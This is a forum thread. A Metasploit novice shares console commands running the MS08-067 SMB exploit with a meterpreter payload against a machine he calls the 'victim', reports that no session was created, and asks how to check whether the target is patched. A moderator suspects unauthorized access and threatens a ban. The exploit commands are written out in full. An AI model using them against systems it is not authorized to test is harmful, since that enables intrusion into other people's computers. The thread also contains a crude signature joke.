That usually means that the computer you just attacked is not vulnerable to that exploit. Is the patch installed?
i'm a noob in metasploit framework, but yesterday i found out what's the "deal" with it, so i tested it but the error "Exploit completed, but no session was created." won't let me in:|
victim:172.27.0.99
445/tcp open microsoft-ds (nmap scan for victim)
framework 3 code (today updated):
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 172.27.0.99
RHOST => 172.27.0.99
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 2 - lang:English[*] Selected Target: Windows XP SP2 English (NX)[*] Triggering the vulnerability...[*] Exploit completed, but no session was created.

Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

how can i find out if the victim's windows has the patch?:d
Thx for reply
Ouch! If you don't know then that means your not in charge of the target box. We do not condone illegal activities here what-so-ever. So before I ban you I would suggest you find a target that you do control.
To further help you out. Do not make another post here about "I do control it" etc. Because now it is too late. And because the coffee is good today. Look at this
